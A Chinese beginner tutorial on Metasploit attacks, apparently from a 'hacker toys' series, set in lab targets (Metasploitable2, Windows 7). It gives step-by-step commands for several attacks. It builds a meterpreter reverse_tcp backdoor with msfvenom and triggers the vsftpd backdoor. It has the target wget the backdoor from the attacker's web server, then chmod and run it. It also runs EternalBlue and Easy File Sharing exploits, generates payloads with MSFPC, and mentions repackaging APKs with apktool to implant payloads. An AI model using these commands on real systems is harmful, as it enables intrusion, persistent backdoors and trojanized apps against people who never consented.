黑客玩具入门——5、继续Metasploit

1、利用FTP漏洞并植入后门

实验靶机：Metasploitable2。

实践：

1. 使用nmap扫描目标靶机
   1. nmap -sV xxx.xxx.xxx.xxx（目标ip）
2. 生成linux系统后门
   1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx(主控端ip) LPORT=5555 -f elf -o /home/xxxx(用户名)/backdoor.elf
3. 使用Apache服务在目标主机上下载后门
   1. sudo service apache2 start
   2. sudo cp home/xxxx(用户名)/backdoor.elf /var/www/html/
4. 在主控端浏览器打开apache服务的ip地址，然后右键elf文件，选择Copy Link Location。
5. 手工激活ftp后门。登录名：user:)。密码：pass
   1. 在主控端命令行输入：ftp xxx.xxx.xxx.xxx（靶机ip）。
   2. 输入登录名密码即可。
   3. 可以通过：nc xxx.xxx.xxx.xxx（靶机ip）。尝试判断是否启用成功。
6. 然后在nc的命令行中执行下面的命令，这个地址就是你之前右键复制的那个地址。
   1. wget http://192.168.10.129/backdoor.elf。
   2. 然后可以通过 cd / --> ls命令。看有没有这个文件。
7. 然后，启用主控端。打开Metasploit，就跟之前一样。
   1. use exploit/multi/handler
   2. set payload linux/x86/meterpreter/reverse_tcp
   3. set lhost xxx.xxx.xxx.xxx（主控端ip）
   4. set lport 5555
   5. run
8. 在目标主机上运行后门。以下命令在nc的命令行中操作：
   1. ./backdoor.elf。你会发现权限不足。
   2. chmod 7777 ./backdoor.elf。
   3. 然后再执行就可以了：./backdoor.elf。
9. 然后，你就可以在meterpreter中为所欲为了。

2、常用攻击软件

由于Windows7使用了比较安全的机制，所以入侵win7远比入侵Windows xp要难得多。虽然系统本身很安全，但是我们不可能只安装一个系统，就什么都没有了，系统内我们还会安装很多软件，我们就可以从这些应用软件入手，去寻找他们的漏洞，借助这些软件做跳板，去入侵系统。

之前我们使用的是python脚本去攻击Easy File Sharing软件，使软件卡死。并成功在目标计算机上打开了计算器，这回我们使用Metasploit来攻击这个应用程序。

实验靶机：Windows7。

实践：

1. search easyfilesharing。
2. use exploit/windows/http/easyfilesharing_seh。
3. set rhost xxx.xxx.xxx.xxx（目标ip）。
4. set lport 6666。
5. run。
6. execute -f calc.exe。打开计算器。

3、攻击Windows7系统蓝屏

实验靶机：Windows7。

实践：

1. search ms17-010。
2. use exploit/windows/smb/ms17_010_eternalblue。
3. set rhost xxx.xxx.xxx.xxx（目标ip）。
4. set lport 6666。
5. set payload windows/meterpreter/reverse_tcp。
6. run。
7. 然后Windows就蓝屏了。

4、漏洞利用工具集：MSFPC

生成payload的默认工具是MSFvenom，这是一个独立于Metasploit的payload生成器及编辑器。虽然它是一个非常强的payload生成神器，但是对于一个新手来说，可能难以在短时间内熟悉其操作。即使在进程最初的了解之后，生成一个基本的payload也需要输入相当多的内容。

MSFPC，或者说是MSFvenom Payload生成器，其实是一个基于MSFvenom的payload生成器，它简化了基本的有效载荷创建过程，用户使用MSFPC可以尽可能简单的创建Payload。

使用方法：

1. 漏洞利用工具集 --> msf payload creator --> 打开他。
2. sudo msfpc windows xxx.xxx.xxx.xxx(当前主机ip) 6666。
3. 然后会生成这么多东西：

1. 其实就是把我们之前通过手动配置的东西都自动生成了。包括可执行文件、命令脚本等。我们看下如何来使用这些东西
   1. sudo service apache2 start。
   2. 跟之前一样，把刚才生成的可执行文件复制到Apache目录下。这里不写了。
   3. msfconsole -q -r [上面生成的那个.rc文件地址]
   4. 查看session
   5. 使用session。
   6. 成功！

5、Payload 介绍

病毒通常会做一些有害的或者恶意的动作。在病毒代码中实现这个功能的部分叫做“有效载荷（Payload）”。Payload可以实现任何运行在受害者环境中的程序所能做的事情。并且能够执行动作包括破坏文件、删除文件、向病毒的作者或者任意的接收者发送敏感信息，以及提供通向被感染计算机的后门。

Payloads模块，也叫有效载荷或有效负载，也就是我们常说的shellcode。在MSF中为我们提供了大量的Payloads。我们可以再MSF中通过show payloads命令查看。

payloads模块的命名规则

操作系统/类型/模块名称：windows/shell/bind_tcp。

1. shell_find_taf：在一个已建立的链接上创建一个shell
2. shell_reverse_tcp：反向链接到攻击者主机并创建一个shell
3. bind_tcp：监听一个tcp链接。
4. reverse_tcp：反向建立tcp链接。
5. add_user：创建一个新用户并添加到管理组。

payloads模块等级

等级代表好用程度，一般分为以下几个等级：

1. normal：正常
2. excellent：优秀
3. great：极好
4. good：好
5. average：一般、平均
6. manual：手动

查看payloads下的某个模块的详细信息

1. info [模块名]
   • info windows/shell/bind_tcp

6、apk文件的反编译

1）什么是逆向工程？反编译？

就是将已有的APP程序，反向操作，方便我们查看里面的原始文件，因为我们平时拿到的APP程序都是经过加密处理的。

2）反编译有什么用？

可以用来分析APP，比如获取IP地址。将payload植入其他APP等等。

3）APK反编译软件——apktool

1. 反编译apk文件
2. apktool d xxx.apk
3. 将反编译后的文件重新打包
4. apktool b xxx.apk